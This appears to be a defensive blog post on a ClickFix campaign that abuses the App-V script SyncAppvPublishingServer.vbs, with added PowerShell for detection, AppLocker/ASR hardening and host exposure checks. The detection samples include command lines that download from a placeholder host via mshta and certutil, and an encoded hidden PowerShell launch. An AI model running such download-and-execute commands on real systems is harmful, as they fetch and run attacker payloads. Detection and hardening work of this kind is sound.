The App-V script stage of this attack does not work on Windows Home or on a default Windows Pro install.
On the other Windows editions, it can be blocked with the same controls used against standard ClickFix attacks.
The primary "Living off the Land" Binary (LOLBin) used in this campaign is SyncAppvPublishingServer.vbs, a legitimate Microsoft script. Whether it is present on a system determines whether this specific attack vector succeeds in its first stage:
Enterprise, Education, and Server Editions
These versions are highly vulnerable because they include the Application Virtualization (App-V) client and its associated scripts by default.
Windows Pro Edition
While the App-V client is technically part of the OS code for Pro, it is disabled and unstaged in standard installations. Consequently, the script is typically missing from the System32 folder, causing the attack to fail on a default Pro machine.
Windows Home Edition
This edition does not support App-V features and lacks the necessary script entirely, making it naturally resistant to this specific delivery method.
The "ClickFix" Pivot Strategy
Threat actors behind these "ClickFix" campaigns are highly adaptive. If the target system is a Home or Pro version where the App-V script is absent, the automated social engineering lure is designed to pivot to other common LOLBins that are present on all editions.
mshta.exe
Used to execute remote or local HTML Application (.hta) files.
certutil.exe
Abused to download and decode malicious payloads from remote servers.
PowerShell.exe
Leveraged for direct, often encoded, command execution to bypass simple string-based detection.
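The common thread in both the App-V path and the fallback LOLBins above is the launch shape: a command pasted into Win + R runs as a child of explorer.exe. The following PowerShell is an added example, not code from the original post, that hunts for that shape over process-creation records. The records are constructed samples laid out like Security event 4688 / Sysmon event 1 fields; the field names (Parent, Image, CommandLine), the function name, and the placeholder hosts under the .invalid domain are this example's own.

```powershell
# Added example (not from the original post): flag Run-dialog launches that match the
# ClickFix pattern described above. Win+R executes the pasted command as a child of
# explorer.exe, so that parent/child relationship is the anchor for every rule.
# The records below are CONSTRUCTED samples; field names are this example's own.

$Samples = @(
    # App-V publishing script invoked from the Run dialog (the primary vector)
    [pscustomobject]@{ Parent = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\wscript.exe'
                       CommandLine = 'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "<pasted argument>"' }
    # Fallback LOLBins on Home/Pro
    [pscustomobject]@{ Parent = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\mshta.exe'
                       CommandLine = 'mshta.exe http://lure.invalid/verify.hta' }
    [pscustomobject]@{ Parent = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\certutil.exe'
                       CommandLine = 'certutil.exe -urlcache -f http://lure.invalid/p.txt p.txt' }
    [pscustomobject]@{ Parent = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe -w hidden -enc QQBCAEMA' }
    # Benign: a user opening a console from the Run dialog, no encoded payload
    [pscustomobject]@{ Parent = 'C:\Windows\explorer.exe'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'powershell.exe' }
    # Benign: App-V's own scheduled publishing refresh, not launched from the Run dialog
    [pscustomobject]@{ Parent = 'C:\Windows\System32\svchost.exe'; Image = 'C:\Windows\System32\wscript.exe'
                       CommandLine = 'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs' }
)

function Find-ClickFixLaunch {
    param([Parameter(Mandatory)][object[]]$Records)

    foreach ($r in $Records) {
        $parent = [System.IO.Path]::GetFileName($r.Parent).ToLowerInvariant()
        $image  = [System.IO.Path]::GetFileName($r.Image).ToLowerInvariant()
        $cmd    = $r.CommandLine

        # Only Run-dialog launches are in scope; anything else is ignored.
        if ($parent -ne 'explorer.exe') { continue }

        $reason = switch ($image) {
            { $_ -in 'wscript.exe', 'cscript.exe' } {
                if ($cmd -match 'SyncAppvPublishingServer\.vbs') { 'App-V publishing script used as a proxy' }
            }
            'mshta.exe'    { 'mshta launched from the Run dialog' }
            'certutil.exe' { if ($cmd -match '-(urlcache|decode)') { 'certutil download/decode from the Run dialog' } }
            { $_ -in 'powershell.exe', 'pwsh.exe' } {
                # Plain console launches are normal; encoded command lines are the tell.
                if ($cmd -match '\s-(e|ec|enc|encodedcommand)\s') { 'encoded PowerShell from the Run dialog' }
            }
        }

        if ($reason) {
            [pscustomobject]@{ Image = $image; Reason = $reason; CommandLine = $cmd }
        }
    }
}

# Expected: four hits (wscript, mshta, certutil, encoded powershell); the two benign records are skipped.
Find-ClickFixLaunch -Records $Samples | Format-Table Image, Reason -AutoSize
```

In production the records would come from Get-WinEvent on the Security or Sysmon log rather than the inline array; the rules themselves do not change. The svchost.exe sample matters on Enterprise hosts that still use App-V: the legitimate publishing refresh runs the same script, so the parent check is what keeps the rule from paging on every refresh.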
Behavioral Redline
Train all users to recognize that no legitimate CAPTCHA will ever require pressing Win + R and pasting code.
Hardening App-V (Enterprise/Education)
If your environment does not require Application Virtualization, use AppLocker or Windows Defender Application Control (WDAC) to explicitly block SyncAppvPublishingServer.vbs.
ASR Rules
Enable Microsoft Defender Attack Surface Reduction (ASR) rules, specifically:
Block Office applications from creating child processes.
Block execution of potentially obfuscated scripts.
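The two controls above (the AppLocker block for SyncAppvPublishingServer.vbs and the two ASR rules) can be applied locally with the following PowerShell. This is an added example, not code from the original post or from Microsoft. It assumes an elevated session on an Enterprise/Education host with the AppLocker and Defender modules present, and that the host has no Script-collection AppLocker rules yet, which is why the standard default allow rules are included: an AppLocker collection with only a deny rule would block every other script too. The rule GUIDs for the two ASR rules are taken from Microsoft's ASR rules reference as I know it; cross-check them before rollout. Both controls start in audit mode and are switched to enforcement once the audit logs are clean.

```powershell
# Added example (not from the original post): local hardening for the App-V script
# and the two ASR rules named above. Run elevated. Assumes no existing Script-
# collection AppLocker rules (default allow rules are included so ordinary scripts
# keep running). Start in audit mode, then flip to enforcement.

# 1. AppLocker: Deny rule for the App-V publishing script, plus the standard defaults.
$EnforcementMode = 'AuditOnly'   # change to 'Enabled' after reviewing AppLocker audit events
$policyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Script" EnforcementMode="$EnforcementMode">
    <FilePathRule Id="$([guid]::NewGuid())" Name="Scripts in Windows folder" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%WINDIR%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Scripts in Program Files" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions><FilePathCondition Path="%PROGRAMFILES%\*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Administrators run all scripts" Description="" UserOrGroupSid="S-1-5-32-544" Action="Allow">
      <Conditions><FilePathCondition Path="*" /></Conditions>
    </FilePathRule>
    <FilePathRule Id="$([guid]::NewGuid())" Name="Deny SyncAppvPublishingServer.vbs" Description="ClickFix proxy script" UserOrGroupSid="S-1-1-0" Action="Deny">
      <Conditions><FilePathCondition Path="%SYSTEM32%\SyncAppvPublishingServer.vbs" /></Conditions>
    </FilePathRule>
  </RuleCollection>
</AppLockerPolicy>
"@
# Deny beats Allow in AppLocker, so the last rule wins for everyone, including admins.
$policyPath = Join-Path $env:TEMP 'clickfix-appv-deny.xml'
Set-Content -Path $policyPath -Value $policyXml -Encoding UTF8
Set-AppLockerPolicy -XmlPolicy $policyPath -Merge   # -Merge keeps rules in the other collections

# AppLocker only evaluates rules while the Application Identity service runs.
# Its startup type is protected on current builds, so use sc.exe rather than Set-Service.
sc.exe config appidsvc start= auto
sc.exe start appidsvc

# 2. Defender ASR: the two rules named above, by their documented rule GUIDs
#    (from Microsoft's ASR rules reference; verify before rollout).
$asrRules = [ordered]@{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
}
foreach ($id in $asrRules.Keys) {
    Write-Host "ASR $id -> $($asrRules[$id]) (AuditMode)"
    # AuditMode only logs what would have been blocked; switch to Enabled when the log is clean.
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions AuditMode
}

# Show the resulting state.
Get-AppLockerPolicy -Effective -Xml | Select-String 'SyncAppvPublishingServer'
Get-MpPreference | Select-Object AttackSurfaceReductionRules_Ids, AttackSurfaceReductionRules_Actions
```

At scale the same XML goes into a GPO or Intune AppLocker CSP rather than Set-AppLockerPolicy on each host, and the ASR rules are pushed through Intune or Group Policy; the local form above is useful for testing the effect on one machine before that.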
Local Verification
You can verify whether the App-V script that this campaign abuses as a proxy is present on any machine by running this command in PowerShell:
Test-Path "C:\Windows\System32\SyncAppvPublishingServer.vbs"
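The one-line Test-Path above answers whether the script is on disk. The following PowerShell is an added example, not code from the original post, that extends it into a per-host exposure check: the edition, whether the App-V client is enabled, whether an AppLocker rule already covers the script and AppLocker is actually enforcing, and which of the fallback LOLBins named earlier are present. The EditionID registry value and the AppIDSvc service are stock Windows; the Get-AppvStatus property names (AppVClientInstalled, AppVClientEnabled) are as I know them from the inbox AppvClient module and are wrapped in case the module is absent, as on Home and default Pro.

```powershell
# Added example (not from the original post): per-host ClickFix exposure check.
# Assumptions: EditionID under HKLM CurrentVersion, AppIDSvc, and the AppvClient /
# AppLocker cmdlets as documented for Windows 10/11; the optional modules are
# probed with Get-Command so the function also runs on Home/Pro.

function Get-ClickFixExposure {
    $sys32      = Join-Path $env:SystemRoot 'System32'
    $scriptPath = Join-Path $sys32 'SyncAppvPublishingServer.vbs'

    # EditionID values look like 'Enterprise', 'Education', 'Professional', 'Core' (Home).
    $edition = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').EditionID

    # App-V client state, when the inbox module is present (Enterprise/Education; Pro if staged).
    $appv = 'AppvClient module not present'
    if (Get-Command Get-AppvStatus -ErrorAction SilentlyContinue) {
        $s = Get-AppvStatus
        $appv = "installed=$($s.AppVClientInstalled) enabled=$($s.AppVClientEnabled)"
    }

    # Is the script already named in an AppLocker rule, and is AppLocker able to enforce it?
    $appLockerRule = $false
    if (Get-Command Get-AppLockerPolicy -ErrorAction SilentlyContinue) {
        $xml = Get-AppLockerPolicy -Effective -Xml -ErrorAction SilentlyContinue
        $appLockerRule = [bool]($xml -match 'SyncAppvPublishingServer\.vbs')
    }
    $appIdSvc = (Get-Service -Name AppIDSvc -ErrorAction SilentlyContinue).Status

    # The fallback LOLBins exist on every edition, so this is for awareness, not a finding.
    $fallback = 'mshta.exe', 'certutil.exe', 'WindowsPowerShell\v1.0\powershell.exe' |
        ForEach-Object { Join-Path $sys32 $_ } |
        Where-Object { Test-Path $_ } |
        ForEach-Object { Split-Path $_ -Leaf }

    [pscustomobject]@{
        Edition             = $edition
        AppVScriptPresent   = Test-Path $scriptPath
        AppVClient          = $appv
        AppLockerRuleForVbs = $appLockerRule
        AppIDSvcStatus      = $appIdSvc
        FallbackLolbins     = ($fallback -join ', ')
    }
}

Get-ClickFixExposure | Format-List
```

A host that reports AppVScriptPresent = True with AppLockerRuleForVbs = False, or with AppIDSvcStatus anything other than Running, is one where the App-V path described in this post still works; the FallbackLolbins line is a reminder that Home and Pro hosts are not out of scope for the pivot, only for the first stage.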